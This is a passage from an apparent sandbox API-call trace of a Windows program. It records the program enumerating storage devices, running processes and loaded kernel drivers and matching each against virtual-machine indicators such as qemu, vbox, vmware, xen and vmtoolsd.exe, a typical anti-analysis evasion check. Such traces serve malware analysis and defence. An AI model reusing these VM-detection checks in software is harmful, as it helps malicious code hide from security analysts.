uBytes=0x4e) returned 0x1faac0 [0129.936] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x1faac0, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x1faac0, ResultLength=0x19ff48) returned 0x0 [0129.937] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0129.937] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0129.937] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0129.937] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0129.937] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0129.937] LocalFree (hMem=0x1faac0) returned 0x0 [0129.937] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0129.937] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x1faac0 [0129.937] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x1faac0, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x1faac0, ResultLength=0x19ff48) returned 0x0 [0129.938] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0129.938] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0129.938] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0129.938] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0129.938] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0129.938] LocalFree (hMem=0x1faac0) returned 0x0 [0129.938] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0129.938] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x1faac0 [0129.938] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x1faac0, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x1faac0, ResultLength=0x19ff48) returned 0x0 [0129.939] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0129.939] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0129.939] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0129.939] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0129.939] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0129.939] LocalFree (hMem=0x1faac0) returned 0x0 [0129.939] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0129.939] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x1faac0 [0129.939] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x1faac0, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x1faac0, ResultLength=0x19ff48) returned 0x0 [0129.940] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0129.940] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0129.940] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0129.940] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0129.940] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0129.940] LocalFree (hMem=0x1faac0) returned 0x0 [0129.940] LocalFree (hMem=0x1fa060) returned 0x0 [0129.940] NtClose (Handle=0x15c) returned 0x0 [0129.940] LocalFree (hMem=0x1f8950) returned 0x0 [0129.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1f5c0) returned 0xc0000004 [0130.000] LocalAlloc (uFlags=0x40, uBytes=0x205c0) returned 0x1da2050 [0130.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1da2050, Length=0x205c0, ResultLength=0x19ff54 | out: SystemInformation=0x1da2050, ResultLength=0x19ff54*=0x18650) returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0130.005] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0130.005] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.005] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0130.005] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0130.005] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.005] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.005] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.006] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.006] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.006] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.006] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0130.006] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0130.006] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.007] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.007] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.007] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.007] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.007] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.007] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0130.008] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0130.008] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.008] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.008] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.008] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.008] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.009] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.009] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.010] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0130.010] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.011] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0130.012] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0130.012] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0130.012] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0130.012] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0130.012] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0130.012] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0130.012] LocalFree (hMem=0x1da2050) returned 0x0 [0130.012] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x9800) returned 0xc0000004 [0130.013] LocalAlloc (uFlags=0x40, uBytes=0xa800) returned 0x1da2050 [0130.013] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1da2050, Length=0xa800, ResultLength=0x19ff54 | out: SystemInformation=0x1da2050, ResultLength=0x19ff54*=0x9800) returned 0x0 [0130.013] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0130.013] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0130.013] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0130.014] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0130.014] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0130.015] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0130.015] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0130.015] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0130.015] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0130.015] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0130.016] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0130.017] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0130.017] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0130.017] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0130.017] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0130.017] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0130.018] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0130.018] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0130.019] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0130.019] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0130.020] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0130.020] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0130.020] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0130.020] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0130.020] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0130.020] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0130.020] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0130.020] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0130.021] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0130.021] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0130.021] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0130.021] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0130.021] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0130.021] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0130.021] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0130.022] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0130.022] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0130.022] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0130.022] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0130.023] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0130.023] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0130.025] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0130.025] strstr (_Str="clipsp.sys", 